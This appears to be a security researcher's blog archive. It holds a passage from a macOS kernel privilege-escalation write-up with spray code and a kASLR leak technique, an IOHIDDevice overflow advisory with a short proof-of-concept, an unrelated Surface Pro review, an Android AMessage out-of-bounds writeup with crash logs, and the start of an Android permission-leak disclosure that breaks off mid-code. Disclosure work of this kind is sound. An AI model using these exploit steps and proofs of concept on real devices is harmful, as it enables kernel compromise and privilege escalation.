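Writing the pair at SERVICE_OFFSET - 4 replaces only the low dword of the pointer, turning 0xffffff80deadbeef into 0xffffff80bf800000, at the cost of clobbering the 4 bytes that precede the field. Writing it at SERVICE_OFFSET itself would destroy the 0xffffff80 upper half.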

RIP control

Further study reveals there are virtual function calls on this pointer. But we need to take extra care: we cannot directly call the fake service's virtual function, because the header of vm_map_copy is not controllable. So we take another approach, having found that the context_finish function does an indirect call on service->mEventMachine:

__int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this)
{
  int v1; // eax@1
  unsigned int v2; // ecx@1

  v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent(
         this->service->mEventMachine,

We now adjust our goal to overwriting the service field of any IGAccelVideoContext. Given no knowledge of heap addresses, we again need to spray lots of userclients. After trial and error we settled on the following steps:

  • spray 0x50,000 ool_msgs, pushing the heap to cover 0xffffff80 bf800000 (B) with controlled content (ool)
  • free the middle part of the ool_msgs and fill it with IGAccelVideoContext, covering 0xffffff80 62388000 (A)
  • perform the write at A - 4 + 0x528 descending, changing the service pointer to 0xffffff80 bf800000 (B)
  • call each IGAccelVideoContext's externalMethod and detect corruption

Why do we choose the particular addresses A and B? As recalled in previous paragraphs, we can only write floats in particular ranges to the target location, which means we can change a pointer like 0xffffff80 deadbeef to 0xffffff80 3xxxxxxx, 0xffffff80 4xxxxxxx, 0xffffff80 cxxxxxxx, 0xffffff80 dxxxxxxx or 0xffffff80 bf800000. These addresses are either too low (kASLR changes on each boot, and a high kASLR value may shift the heap very high, flooding 0xffffff80 4xxxxxxx) or too high (reaching them takes a lot of spray time). So we choose to write 0xbf800000 to the pointer, and taking half of B leads to A.

This code snippet shows how to do the previously mentioned steps:

mach_msg_size_t size = 0x2000;
mach_port_name_t my_port[0x500];
memset(my_port, 0, 0x500 * sizeof(mach_port_name_t));
char *buf = malloc(size);
memset(buf, 0x41, size);
*(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2;
*(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2;

for (int i = 0; i < 0x500; i++) {
    *(unsigned int *)buf = i;
    printf("number %x success with %x.\n",i , send_msg(buf, size, &my_port[i]));
}
for (int i = 0x130; i < 0x250; i++)
{
    read_kern_data(my_port[i]);
}
printf("press enter to fill in IOSurface2.\n");
io_service_t serv = open_service("IOAccelerator");
io_connect_t *deviceConn2;
deviceConn2 = malloc(0x12000 * sizeof(io_connect_t));
kern_return_t kernResult;
for (int i =0; i < 0x12000; i ++)
{
    kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]);
    printf("%x with result %x.\n", i , kernResult);
}

This figure should make it clearer.

change-service-field

Head or middle?

Smart readers may have noticed a critical problem. Given that the size of the userclient is 0x2000, how can we be sure that the head of a userclient falls right at A? Why can't A fall in the middle of an IGAccelVideoContext?

Yes, you're right. It's a 50-50 chance. If A falls in the middle of a userclient, overwriting A - 4 + 0x528 corrupts nothing meaningful and the exploit fails. Can we let this happen? Absolutely not. We need to trigger the write twice, at both A - 4 + 0x528 and A - 4 + 0x528 + 0x1000.

So now you can understand why I mentioned earlier that we may need a double-write in kalloc.48. By alternating the values of the sprayed IOCatalogueSendData content in an odd-even pattern and triggering the vulnerability multiple times, we can ensure a nearly 100% chance that both locations are overwritten.

Bypassing kASLR

We know Steve Jobs (or Tim Cook?) will not make our life so easy: even though we have figured out a way to control RIP, we still have a big obstacle to overcome, the Royal kASLR. But where there's a will, there's a way. Let's revisit what we have. We have a known address A covered by an IGAccelVideoContext, and a known address B covered by controlled vm_map_copy content, which we can change as we wish just by freeing and refilling the ool_msgs. Is there any userclient function that returns the content at a specified address, given that we now control the whole body of the fake userclient?

With a bit of luck, the externalMethod function get_hw_steppings caught our attention.

__int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2)
{
  __int64 service; // rax@1

  service = a1->service;
  *a2 = *(_DWORD *)(service + 0x1140);
  a2[1] = *(_DWORD *)(service + 0x1144);
  a2[2] = *(_DWORD *)(service + 0x1148);
  a2[3] = *(_DWORD *)(service + 0x114C);
  a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
  return 0LL;
}

Eureka!

a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);

Given that service + 0x1288 is controlled by us, this is a perfect way to return the value at an arbitrary address. Although only one byte is returned, that is not a big deal, because we can free and refill the ool_msgs as many times as we wish and read one byte at a time. We now come up with these steps:

  • by spraying, ensure that an IGAccelVideoContext lies at 0xf… 62388000 (A) and a vm_map_copy of size 0x2000 lies at 0xf… bf800000 (B)
  • overwrite the service pointer to B, pointing it to the controlled vm_map_copy filled with 0x4141414141414141 (except at 0x1288, which is set to A - 0xD0)
  • test for 0x41414141 by calling get_hw_steppings on the sprayed userclients
  • on a match, we have the index of the corrupted userclient, and a2[4] returns a byte at A!

This figure should make it clearer:

infoleak-0
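The byte-at-a-time read can be sketched in Python against a simulated memory. This is only an illustration under stated assumptions: `FakeKernel`, `leak_qword`, and the addresses used for A and B are hypothetical stand-ins, and a real exploit would refill the ool_msgs and call the corrupted userclient rather than read a dictionary. Only the `0x1288` and `0xD0` offsets come from the decompiled function.

```python
import struct

SERVICE_PTR_OFFSET = 0x1288  # field dereferenced by get_hw_steppings (from the listing)
BYTE_OFFSET = 0xD0           # offset added before the final one-byte read (from the listing)


class FakeKernel:
    """Hypothetical stand-in for kernel memory: a sparse map of address -> byte."""

    def __init__(self):
        self.mem = {}

    def write(self, addr, data):
        for i, b in enumerate(data):
            self.mem[addr + i] = b

    def read_qword(self, addr):
        raw = bytes(self.mem.get(addr + i, 0) for i in range(8))
        return struct.unpack("<Q", raw)[0]

    def get_hw_steppings_byte(self, service):
        # Models a2[4] = *(u8 *)(*(u64 *)(service + 0x1288) + 0xD0)
        ptr = self.read_qword(service + SERVICE_PTR_OFFSET)
        return self.mem.get(ptr + BYTE_OFFSET, 0)


def leak_qword(kernel, fake_service, target):
    """Read 8 bytes at `target`, one byte per refill of the fake service body."""
    out = bytearray()
    for i in range(8):
        # "Refill": point the controlled field at (target + i) - 0xD0.
        kernel.write(fake_service + SERVICE_PTR_OFFSET,
                     struct.pack("<Q", target + i - BYTE_OFFSET))
        out.append(kernel.get_hw_steppings_byte(fake_service))
    return struct.unpack("<Q", bytes(out))[0]


kernel = FakeKernel()
B = 0x10000  # hypothetical address of the controlled vm_map_copy data
A = 0x20000  # hypothetical address we want to read from
kernel.write(A, struct.pack("<Q", 0xFFFFFF7F8BD4C283))
leaked = leak_qword(kernel, B, A)
```

Eight refills recover one pointer-sized value, which is why the one-byte limit of the primitive is only a matter of patience.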

Head or middle, again

The smart reader will again notice that we are assuming A falls at the beginning of an IGAccelVideoContext. Likewise, nobody guarantees that B falls right at the beginning of the 0x2000-size vm_map_copy. Each is a 50-50 chance.

For the latter we take the same approach as before: when preparing the ool_msg, we set both 0x1288 and 0x288 to A – 0xD0. The former problem is a bit more complicated.

We observed that the value at offset 0x1000 of a normal IGAccelVideoContext is zero. Since we can now read the content at address A, this gives us a way to distinguish the two situations with one additional read. If we try A but the object actually starts at A+0x1000, we read the byte at +0x1000 of an IGAccelVideoContext, which is 0; we then try again with A+0x1000 to read the correct value.

read-middle

These two figures may give you a clearer picture of this trial-and-error approach.

read-1 read-2
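The trial-and-error step can be sketched the same way. This is a simplified model, not the exploit code: `find_object_start` and `make_reader` are hypothetical names, the marker byte `0x68` is arbitrary, and the sketch assumes the first byte of the object is non-zero while offset +0x1000 reads as zero. A real check would likely compare more than one byte.

```python
OBJECT_SIZE = 0x2000  # size of the sprayed object, per the text
HALF = 0x1000


def find_object_start(read_byte, a):
    """Return `a` if a non-zero byte is read there, otherwise fall back to a + 0x1000.

    Assumes offset +0x1000 of the object reads as zero and offset 0 does not.
    """
    if read_byte(a) != 0:
        return a
    return a + HALF


def make_reader(first_object_start):
    """Simulate back-to-back objects: non-zero at offset 0, zero everywhere else."""
    def read_byte(addr):
        offset = (addr - first_object_start) % OBJECT_SIZE
        return 0x68 if offset == 0 else 0
    return read_byte


A = 0x62388000  # low 32 bits of the sprayed address, for illustration only

head_reader = make_reader(A)           # A is the beginning of an object
middle_reader = make_reader(A - HALF)  # A is the middle of an object

start_if_head = find_object_start(head_reader, A)
start_if_middle = find_object_start(middle_reader, A)
```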

Wrap it up

Leak an arbitrary address, leak the vtable pointer, prepare your gadgets, ahh. I’m a bit tired, hmm, so if you are curious about what the blitzard vulnerability itself actually is, don’t miss our talk at Mandalay Bay GH on August 3 at 11:30, Black Hat USA. Hope to see you there 🙂

Also, it’s a pity the vulnerability was not selected for the Pwnie nominations; we will come up with a better one next year 🙂

Video is available at https://www.youtube.com/watch?v=1bnSDgzZDc0 and http://v.qq.com/x/page/f0196p3g7vq.html. Some spraying time is omitted. The article is also posted on http://keenlab.tencent.com/en/2016/07/29/The-Journey-of-a-complete-OSX-privilege-escalation-with-a-single-vulnerability-Part-1/.

Integer overflow due to compile behavior in OSX Kernel IOUSBHIDDevice

Interesting Integer overflow in enum comparison IOHIDDevice::handleReportWithTime

By flanker from KeenLab.

There exists a signed integer comparison overflow in IOHIDDevice::_getReport and then handleReportWithTime, which can lead to OOB access/execution in handleReportWithTime. A normal process can leverage this vulnerability to achieve potential code execution in the kernel and escalate privileges.

Vulnerability analysis

When IOHIDLibUserClient::_getReport is called via externalMethod, execution flows into IOHIDDevice::getReport and then into IOHIDDevice::handleReportWithTime:

IOReturn IOHIDLibUserClient::getReport(IOMemoryDescriptor * mem, uint32_t * pOutsize, IOHIDReportType reportType, uint32_t reportID, uint32_t timeout, IOHIDCompletion * completion)
{
    IOReturn ret = kIOReturnBadArgument;

    // VTN3: Is there a real maximum report size? It looks like the current limit is around
    // 1024 bytes, but that will (or has) changed. 65536 is above every upper limit
    // I have seen by a few factors.
    if (*pOutsize > 0x10000) {
        IOLog("IOHIDLibUserClient::getReport called with an irrationally large output size: %lu\n", (long unsigned) *pOutsize);
    }
    else if (fNub && !isInactive()) {
        ret = mem->prepare();
        if(ret == kIOReturnSuccess) {
            if (completion) {
                AsyncParam * pb = (AsyncParam *)completion->parameter;
                pb->fMax        = *pOutsize;
                pb->fMem        = mem;
                pb->reportType  = reportType;

                mem->retain();

                ret = fNub->getReport(mem, reportType, reportID, timeout, completion);
            }
            else {
                ret = fNub->getReport(mem, reportType, reportID);

                // make sure the element values are updated.
                if (ret == kIOReturnSuccess)
                    fNub->handleReport(mem, reportType, kIOHIDReportOptionNotInterrupt);

                *pOutsize = mem

Then handleReport and handleReportWithTime will be called.

2174IOReturn IOHIDDevice::handleReportWithTime(
2175    AbsoluteTime         timeStamp,
2176    IOMemoryDescriptor * report,
2177    IOHIDReportType      reportType,
2178    IOOptionBits         options)
2179{
2180    IOBufferMemoryDescriptor *  bufferDescriptor    = NULL;
2181    void *                      reportData          = NULL;
2182    IOByteCount                 reportLength        = 0;
2183    IOReturn                    ret                 = kIOReturnNotReady;
2184    bool                        changed             = false;
2185    bool                        shouldTickle        = false;
2186    UInt8                       reportID            = 0;
2187
2188    IOHID_DEBUG(kIOHIDDebugCode_HandleReport, reportType, options, __OSAbsoluteTime(timeStamp), getRegistryEntryID());
2189
2190    if ((reportType == kIOHIDReportTypeInput) && !_readyForInputReports)
2191        return kIOReturnOffline;
2192
2193    // Get a pointer to the data in the descriptor.
2194    if ( !report )
2195        return kIOReturnBadArgument;
2196
2197    if ( reportType >= kIOHIDReportTypeCount )
2198        return kIOReturnBadArgument;
2199
2200    reportLength = report->getLength();
2201    if ( !reportLength )
2202        return kIOReturnBadArgument;
2203
2204    if ( (bufferDescriptor = OSDynamicCast(IOBufferMemoryDescriptor, report)) ) {
2205        reportData = bufferDescriptor->getBytesNoCopy();
2206        if ( !reportData )
2207            return kIOReturnNoMemory;
2208    } else {
2209        reportData = IOMalloc(reportLength);
2210        if ( !reportData )
2211            return kIOReturnNoMemory;
2212
2213        report->readBytes( 0, reportData, reportLength );
2214    }

On line 2197 there is a signed integer comparison problem. The compiler treats kIOHIDReportTypeCount, which is an enum value, as signed, and the generated assembly is as follows:

__text:0000000000006951                 mov     r13d, 0E00002C2h
__text:0000000000006957                 jz      loc_6BBE
__text:000000000000695D                 cmp     r15d, 2
__text:0000000000006961                 jg      loc_6BBE

We can see that jg is used, which indicates a signed comparison.

The reportType is an int32 value determined by the incoming externalMethod scalar:

In function setReport:
    else
        if ( arguments->structureInputDescriptor )
            ret = target->setReport( arguments->structureInputDescriptor, (IOHIDReportType)arguments->scalarInput[0], (uint32_t)arguments->scalarInput[1]);
        else
            ret = target->setReport(arguments->structureInput, arguments->structureInputSize, (IOHIDReportType)arguments->scalarInput[0], (uint32_t)arguments->scalarInput[1]);

    return ret;
}

So an attacker can supply a value that is negative when interpreted as signed, e.g. 0x80000000, in the scalar input and cause an OOB access in handleReportWithTime:


        // The first byte in the report, may be the report ID.
        // XXX - Do we need to advance the start of the report data?

        reportID = ( _reportCount > 1 ) ? *((UInt8 *) reportData) : 0;

        // Get the first element in the report handler chain.

        element = GetHeadElement( GetReportHandlerSlot(reportID),
                                  reportType);

We can see reportType is used in GetHeadElement, and

#define GetHeadElement(slot, type)  _reportHandlers[slot].head[type]

The type is used as an index into the head array, so we can control the element pointer, and a virtual call follows:

        while ( element ) {

            element->createReport(reportID, reportData, &reportLength, &element);


    virtual bool createReport( UInt8           reportID,
                               void *        reportData, // report should be allocated outside this method
                               UInt32 *        reportLength,
                               IOHIDElementPrivate ** next );

Thus code execution is possible if memory is prepared appropriately.

CrashLog

We can see a page fault is generated on oob access, indicating the negative 32bit integer has been used as index when accessing memory.

panic(cpu 1 caller 0xffffff800af85b8f): "vm_page_check_pageable_safe: trying to add page" "from compressor object (0xffffff800b6c35f0) to pageable queue"@/Library/Caches/com.apple.xbs/Sources/xnu/xnu-3248.40.184/osfmk/vm/vm_resident.c:7076
Backtrace (CPU 1), Frame : Return Address
0xffffff911638b230 : 0xffffff800aedab12 mach_kernel : _panic + 0xe2
0xffffff911638b2b0 : 0xffffff800af85b8f mach_kernel : _vm_page_check_pageable_safe + 0x3f
0xffffff911638b2d0 : 0xffffff800af4a8e3 mach_kernel : _vm_fault_enter + 0x9b3
0xffffff911638b450 : 0xffffff800af4e80b mach_kernel : _vm_page_validate_cs_mapped_chunk + 0x226b
0xffffff911638b670 : 0xffffff800afcdf6d mach_kernel : _kernel_trap + 0x47d
0xffffff911638b850 : 0xffffff800afec273 mach_kernel : _return_from_trap + 0xe3
0xffffff911638b870 : 0xffffff7f8bd4c283 com.apple.iokit.IOHIDFamily : __ZN11IOHIDDevice20handleReportWithTimeEyP18IOMemoryDescriptor15IOHIDReportTypej + 0x191
0xffffff911638b9f0 : 0xffffff7f8bd4ad45 com.apple.iokit.IOHIDFamily : __ZN11IOHIDDevice12handleReportEP18IOMemoryDescriptor15IOHIDReportTypej + 0x5b
0xffffff911638ba30 : 0xffffff7f8bd486b2 com.apple.iokit.IOHIDFamily : __ZN18IOHIDLibUserClient9getReportEP18IOMemoryDescriptorPj15IOHIDReportTypejjP15IOHIDCompletion + 0x12c
0xffffff911638ba80 : 0xffffff7f8bd4877b com.apple.iokit.IOHIDFamily : __ZN18IOHIDLibUserClient9getReportEPvPj15IOHIDReportTypejjP15IOHIDCompletion + 0x99
0xffffff911638bad0 : 0xffffff7f8bd46c3b com.apple.iokit.IOHIDFamily : __ZN18IOHIDLibUserClient10_getReportEPS_PvP25IOExternalMethodArguments + 0x13b
0xffffff911638bb30 : 0xffffff800b4b5958 mach_kernel : __ZN13IOCommandGate9runActionEPFiP8OSObjectPvS2_S2_S2_ES2_S2_S2_S2_ + 0x1a8
0xffffff911638bba0 : 0xffffff7f8bd47556 com.apple.iokit.IOHIDFamily : __ZN18IOHIDLibUserClient14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x64
0xffffff911638bbe0 : 0xffffff800b4df277 mach_kernel : _is_io_connect_method + 0x1e7
0xffffff911638bd20 : 0xffffff800af97cc0 mach_kernel : _iokit_server + 0x5bd0
0xffffff911638be30 : 0xffffff800aedf283 mach_kernel : _ipc_kobject_server + 0x103
0xffffff911638be60 : 0xffffff800aec28b8 mach_kernel : _ipc_kmsg_send + 0xb8
0xffffff911638bea0 : 0xffffff800aed2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5
0xffffff911638bf10 : 0xffffff800afb8bda mach_kernel : _mach_call_munger64 + 0x19a
0xffffff911638bfb0 : 0xffffff800afeca96 mach_kernel : _hndl_mach_scall64 + 0x16
      Kernel Extensions in backtrace:
         com.apple.iokit.IOHIDFamily(2.0)[8D04EA14-CDE1-3B41-8571-153FF3F3F63B]@0xffffff7f8bd46000->0xffffff7f8bdbdfff
            dependency: com.apple.driver.AppleFDEKeyStore(28.30)[C31A19C9-8174-3E35-B2CD-3B1B237C0220]@0xffffff7f8bd3b000

BSD process name corresponding to current thread: Python

POC

KitLib Python Code:

import kitlib
h = kitlib.openMultipleSvc('IOUSBHostHIDDevice', [0,0])[1]
kitlib.callConnectMethod(h, 12, [0x80000000L]*3, '', 0, 1)

Tested on Mac mini/MacBooks with a USB keyboard connected (for this specific IOUSBHIDDevice service). Other services extending IOHIDDevice can of course be affected as well, and other models also apply once the configuration parameters are tuned.
Changing the first parameter to something like 0x8000ffff, we can observe that the fault address changes correspondingly, showing the possibility of exploitation.
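Why the fault address follows the parameter can be illustrated with a little arithmetic. The sketch below assumes a 64-bit kernel in which `head[]` holds 8-byte element pointers and the 32-bit `reportType` is sign-extended before indexing; both are assumptions for illustration, and the helper names are hypothetical.

```python
POINTER_SIZE = 8  # assumption: 64-bit kernel, head[] is an array of element pointers


def to_int32(value):
    """Reinterpret the low 32 bits of `value` as a signed 32-bit integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def head_byte_offset(report_type):
    """Byte offset of head[report_type] relative to head[0] under the assumptions above."""
    return to_int32(report_type) * POINTER_SIZE


offset_a = head_byte_offset(0x80000000)
offset_b = head_byte_offset(0x8000FFFF)
shift = offset_b - offset_a
```

Under these assumptions, moving the parameter from 0x80000000 to 0x8000ffff moves the accessed slot by 0xffff pointer-sized entries, which matches the observation that the fault address changes with the input.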

Fix advice

Add a check that rejects negative reportType values so that only values within the valid range are accepted. Fixed in 10.11.5 by replacing jg with ja.
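The difference between the two instructions can be modelled in a few lines. This is a sketch of the comparison semantics only, with hypothetical function names; the constant 3 for kIOHIDReportTypeCount is inferred from the `cmp r15d, 2` in the listing above.

```python
K_IOHID_REPORT_TYPE_COUNT = 3  # inferred from `cmp r15d, 2` followed by jg


def to_int32(value):
    """Reinterpret the low 32 bits of `value` as a signed 32-bit integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def rejected_signed(report_type):
    """Models `cmp r15d, 2; jg`: reject when the signed value is greater than 2."""
    return to_int32(report_type) > K_IOHID_REPORT_TYPE_COUNT - 1


def rejected_unsigned(report_type):
    """Models `cmp r15d, 2; ja`: reject when the unsigned value is above 2."""
    return (report_type & 0xFFFFFFFF) > K_IOHID_REPORT_TYPE_COUNT - 1


bypasses_old_check = not rejected_signed(0x80000000)
caught_by_new_check = rejected_unsigned(0x80000000)
```

With the signed comparison, 0x80000000 is a large negative number and slips past the bound; with the unsigned one it is a large positive number and is rejected.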

Full POC at https://github.com/flankerhqd/IOUSBHID-IOHID-Overflow

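Surface Pro: First Impressions

(Update: we have received our Pwn2Own prize. ZDI sent a high-end Surface Pro 4, so there is no need to read what follows, 233)

Why buy a Surface

First, my current working environment: my main office machine is a desktop the company provided last year, with 32G RAM + i7 4770K + 128G SSD and 2T SATA, two monitors (27 + 24), running Ubuntu Linux 14.04 with Win10 in VMware. The main performance-hungry work (compiling source code, batch processing, etc.) is done on it. Then there are some servers for fuzzing. Besides that there is a 15-inch RMBP I bought personally at the end of 2012, which has been in service for three years.

In terms of work performance this is still a very powerful combination. The desktop goes without saying, and the MBP shows no signs of fatigue apart from its 8G of memory being slightly insufficient when many virtual machines are open. Since my work relates to Android/Linux, it goes smoothly on these *nix platforms. I don't play many games, and those I play are fairly old, mainly Red Alert 3, so the RMBP's graphics card is enough and I have no need for a desktop with a high-performance graphics card.

But the most obvious problem with this combination is that it is too heavyweight. The desktop obviously can't be carried around, the late-2012 15-inch RMBP is also somewhat heavy, and three years have taken a painful toll on the battery. The iPad isn't up to serious work and is only good for reading PDFs. As time passed and my work changed, I found this problem increasingly noticeable, so I got the itch to buy a lightweight work device. The candidates were few: New Macbook, Macbook Air, Surface and Surface Book.

Surface vs Macbook

Among the four candidates, the New Macbook was eliminated first, because its keyboard left a very bad impression when I tried it in a store. Subconsciously I also felt that two Macbooks would overlap too much, and that I needed a Windows laptop to diversify my gear and take on some lightweight Windows work. The Macbook Air's screen is too poor, so it was ruled out too.

Next came the question of which Surface to choose. Since I already have main mobile and desktop machines and the Surface is positioned as mobile and lightweight, the i7 configuration was not considered. Although the Surface competes with Macbook + iPad, honestly, in the mid-to-high price range (i5 Surface and above, 6k-8k), the Macbook Pro has too great an advantage over the Surface for heavy Linux/*nix users. In the higher range (8000-12000), likewise, the newborn Surface Book has no great advantage over the 15-inch Macbook Pro. My personal philosophy of spending is that I am not afraid of expensive things and don't mind the money, but I want value for it; paying a large premium for features I won't use is a losing deal.

As it happened, JD ran a promotion a few days ago: a Surface Pro 3 with i3 + 128G storage + 4G RAM for 4688. Comparing the Surface Pro 4 with the Pro 3, the changes didn't seem large, yet the price was 1k higher. So, after using some coupons and a JD card given by TSRC, I got it for 4088. I then spent a little over 900 yuan in total on TB and JD for a Type Cover and a stylus.

Usage experience

Overall this is a very satisfying investment: for more than 1k less than the 13-inch Macbook Air (6288), I got relatively good performance, the visual experience of a Macbook Pro, and the portability of an Air. First, the Surface Pro 3's screen is quite stunning, on a par with the Pro's. The i3 Surface is also more than enough for source code auditing, writing and remote desktop. For high-performance work I simply ssh or rdp to the desktop or a server. Battery life is somewhat worse than the Air's but still acceptable.

The Type Cover's key travel is a little short, not as good as the MBP's but better than the Air's; it certainly can't compare with a Cherry mechanical keyboard, but it is tolerable. The Type Cover touchpad can completely replace a mouse. The stylus is of little use, but it does come in handy when reading PDFs.

Summary

In short, this is my experience choosing a lightweight work device this time; I hope it serves as a reference for friends doing similar work.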

ANDROIDID-24123723 (CVE-2015-6620) POC and writeup

github link at https://github.com/flankerhqd/CVE-2015-6620-POC

CVE-2015-6620-POC-1

POC for one bug in CVE-2015-6620-1 (ANDROIDID-24123723), an AMessage unmarshal arbitrary write. Two bugs were merged into one CVE; this is the POC for one of them.

Explanation

sp<AMessage> AMessage::FromParcel(const Parcel &parcel) {
    int32_t what = parcel.readInt32();
    sp<AMessage> msg = new AMessage(what);

    msg->mNumItems = static_cast<size_t>(parcel.readInt32()); //mNumItems can be set by attacker
    for (size_t i = 0; i < msg->mNumItems; ++i) {
        Item *item = &msg->mItems[i];

        const char *name = parcel.readCString();
        item->setName(name, strlen(name));
        item->mType = static_cast<Type>(parcel.readInt32());

        switch (item->mType) {
            {
                item->u.int32Value = parcel.readInt32();//overwrite out-of-bound
                break;
            }

void AMessage::clear() {
    for (size_t i = 0; i < mNumItems; ++i) {
        Item *item = &mItems[i];
        delete[] item->mName; //maybe freeing the wrong pointer if i ran out-of-bound
        item->mName = NULL;
        freeItemValue(item);
    }
    mNumItems = 0;
}

msg->mItems is an array of fixed size kMaxNumItems=64. However, when an AMessage is unmarshalled, the loop counter can be set far beyond this limit, leading to out-of-bounds memory writes or frees of arbitrary pointers, and thus memory corruption.
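The missing validation can be sketched as follows. This is a language-neutral illustration in Python, not the Android patch: `read_item_count` is a hypothetical helper, and only the capacity of 64 comes from the text.

```python
K_MAX_NUM_ITEMS = 64  # fixed capacity of mItems, per the text


def read_item_count(raw_count):
    """Validate an attacker-controlled item count before using it as a loop bound."""
    if raw_count < 0 or raw_count > K_MAX_NUM_ITEMS:
        raise ValueError(
            "item count %d is outside 0..%d" % (raw_count, K_MAX_NUM_ITEMS))
    return raw_count


accepted = read_item_count(64)
```

The negative case matters as well: a negative int32 cast to size_t becomes a very large loop bound.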

Next we need to find a binder interface that unmarshals an AMessage and can be called by an unprivileged application. By searching I found that IStreamListener->issueCommand is a callback that accepts transactions from a normal client and is processed on the mediaserver side. It constructs an AMessage from the input parcel.

To get an IStreamListener, one way is to create a BnStreamSource and pass it to MediaPlayer->setDataSource. During playback, MediaPlayer calls the setListener method of your BnStreamSource implementation, giving the client an IStreamListener through which control parameters are communicated via AMessage. So we supply our fake AMessage here. Boom!

Test method:

Build the POC with the name stream, then run it with adb shell stream ts-file-name. I use a TS media file to trigger the binder callback for simplicity, but there should be better options.

Sample crash:

F/libc    (17405): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdfe85000 in tid 17511 (streaming)
I/DEBUG   (  355): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   (  355): Build fingerprint: 'google/shamu/shamu:5.1.1/LMY48I/2074855:user/release-keys'
I/DEBUG   (  355): Revision: '33696'
I/DEBUG   (  355): ABI: 'arm'
W/NativeCrashListener(  839): Couldn't find ProcessRecord for pid 17405
I/DEBUG   (  355): pid: 17405, tid: 17511, name: streaming  >>> /system/bin/mediaserver <<<
E/DEBUG   (  355): AM write failure (32 / Broken pipe)
I/DEBUG   (  355): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdfe85000
I/DEBUG   (  355):     r0 29685000  r1 d6d5d4d9  r2 b6802e74  r3 fff29685
I/DEBUG   (  355):     r4 b6800000  r5 000003df  r6 b6802e8c  r7 c81fff19
I/DEBUG   (  355):     r8 b6be24b8  r9 000003e2  sl b380bbac  fp b6e65fd8
I/DEBUG   (  355):     ip 0000000c  sp b380bac0  lr b6e31b3d  pc b6e31af6  cpsr 200f0030
I/DEBUG   (  355): 
I/DEBUG   (  355): backtrace:
I/DEBUG   (  355):     #00 pc 00041af6  /system/lib/libc.so (je_arena_dalloc_bin+41)
I/DEBUG   (  355):     #01 pc 00041b39  /system/lib/libc.so (je_arena_dalloc_small+28)
I/DEBUG   (  355):     #02 pc 000498b3  /system/lib/libc.so (ifree+462)
I/DEBUG   (  355):     #03 pc 00012caf  /system/lib/libc.so (free+10)
I/DEBUG   (  355):     #04 pc 0000c943  /system/lib/libstagefright_foundation.so (android::AMessage::clear()+24)
I/DEBUG   (  355):     #05 pc 0000c973  /system/lib/libstagefright_foundation.so (android::AMessage::~AMessage()+18)
I/DEBUG   (  355):     #06 pc 0000c98d  /system/lib/libstagefright_foundation.so (android::AMessage::~AMessage()+4)
I/DEBUG   (  355):     #07 pc 0000ec55  /system/lib/libutils.so (android::RefBase::decStrong(void const*) const+40)
I/DEBUG   (  355):     #08 pc 0003a679  /system/lib/libmediaplayerservice.so (android::sp<android::SharedLibrary>::~sp()+10)
I/DEBUG   (  355):     #09 pc 0005bbeb  /system/lib/libmediaplayerservice.so
I/DEBUG   (  355):     #10 pc 0005be71  /system/lib/libmediaplayerservice.so (android::NuPlayer::NuPlayerStreamListener::read(void*, unsigned int, android::sp<android::AMessage>*)+216)
I/DEBUG   (  355):     #11 pc 000580fb  /system/lib/libmediaplayerservice.so (android::NuPlayer::StreamingSource::onReadBuffer()+50)
I/DEBUG   (  355):     #12 pc 00058271  /system/lib/libmediaplayerservice.so (android::NuPlayer::StreamingSource::onMessageReceived(android::sp<android::AMessage> const&)+20)
I/DEBUG   (  355):     #13 pc 0000c4c3  /system/lib/libstagefright_foundation.so (android::ALooperRoster::deliverMessage(android::sp<android::AMessage> const&)+166)
I/DEBUG   (  355):     #14 pc 0000be45  /system/lib/libstagefright_foundation.so (android::ALooper::loop()+220)
I/DEBUG   (  355):     #15 pc 000104d5  /system/lib/libutils.so (android::Thread::_threadLoop(void*)+112)
I/DEBUG   (  355):     #16 pc 00010045  /system/lib/libutils.so
I/DEBUG   (  355):     #17 pc 00016baf  /system/lib/libc.so (__pthread_start(void*)+30)
I/DEBUG   (  355):     #18 pc 00014af3  /system/lib/libc.so (__start_thread+6)
I/DEBUG   (  355): 
I/DEBUG   (  355): Tombstone written to: /data/tombstones/tombstone_04

Series of vulnerabilities in system_server and mediaserver

CVE-2015-3854 ANDROID-20918350
CVE-2015-3855 ANDROID-20917238
CVE-2015-3856 ANDROID-20917373

Since those were posted prior to the launch of the Android Security Bug Bounty Program, I’m posting them to fulldisclosure for the record.

cveold

Details

A permission leakage exists in Android 5.x that enables a malicious application to acquire the system-level protected permission of DEVICE_POWER.

There exists a permission leakage in packages/SystemUI/src/com/android/systemui/power/PowerNotificationWarnings.java. An attacker app without any permission can turn off battery saver mode (which should be guarded by the system permission DEVICE_POWER, hence the permission leakage) and dismiss the low battery notification.

Analysis

PowerNotificationWarnings registers a dynamic receiver without a permission guard, listening for the following actions:

  • PNW.batterySettings
  • PNW.startSaver
  • PNW.stopSaver
  • PNW.dismissedWarning

PNW.stopSaver calls setSaverMode(false), and thus mPowerMan.setPowerSaveMode(false), which finally calls PowerManager.setPowerSaveMode(false).

(code of PowerNotificationWarnings.java)

```java
private final class Receiver extends BroadcastReceiver {

    public void init() {
        IntentFilter filter = new IntentFilter();
        filter.addAction(ACTION_SHOW_BATTERY_SETTINGS);
        filter.addAction(ACTION_START_SAVER);
        filter.addAction(ACTION_STOP_SAVER);
        filter.addAction(ACTION_DISMISSED_WARNING);
        mContext.registerReceiverAsUser(this, UserHandle.ALL, filter, null, mHandler);
    }

    @Override
    public void onReceive(Context context, Intent intent) {
        final String action = intent.getAction();
        Slog.i(TAG, "Received " + action);
